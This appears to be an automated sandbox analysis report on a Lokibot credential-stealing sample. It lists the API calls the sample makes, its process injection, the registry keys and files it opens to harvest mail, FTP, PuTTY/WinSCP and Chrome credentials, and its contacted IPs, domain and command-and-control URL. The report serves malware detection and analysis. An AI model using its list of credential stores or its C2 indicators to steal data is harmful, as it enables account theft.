Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_735D1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 2_2_735D1A9C
Enables debug privileges
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer, 2_2_00402D63
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_004031D6

Stealing of Sensitive Information
barindex
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: HfJLn9erXb.exe PID: 2912, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: HfJLn9erXb.exe PID: 2912, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 829104 Sample: HfJLn9erXb.exe Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 22 ruhsalgelisim.com 2->22 28 Snort IDS alert for network traffic 2->28 30 Antivirus detection for URL or domain 2->30 32 Multi AV Scanner detection for submitted file 2->32 34 2 other signatures 2->34 8 HfJLn9erXb.exe 1 56 2->8         started        signatures3 process4 file5 18 C:\Users\user\...\AEGISIIIRadeonHelper.dll, PE32+ 8->18 dropped 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 36 Tries to detect Any.run 8->36 12 HfJLn9erXb.exe 21 8->12         started        signatures6 process7 dnsIp8 24 185.246.220.85, 49802, 80 LVLT-10753US Germany 12->24 26 ruhsalgelisim.com 85.95.248.49, 49801, 80 EUROTA-ASNEUROTAINTERNETSERVICESLTDTR Turkey 12->26 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->38 40 Tries to steal Mail credentials (via file / registry access) 12->40 42 Tries to harvest and steal ftp login credentials 12->42 44 2 other signatures 12->44 16 WerFault.exe 2 12->16         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.95.248.49
 ruhsalgelisim.com Turkey
49467 EUROTA-ASNEUROTAINTERNETSERVICESLTDTR false
185.246.220.85
 unknown Germany
10753 LVLT-10753US true

Contacted Domains

Name IP Active
ruhsalgelisim.com 85.95.248.49 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ruhsalgelisim.com/jgEyxsZj50.ttf false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://185.246.220.85/habrik/five/fre.php true
  • Avira URL Cloud: malware
 unknown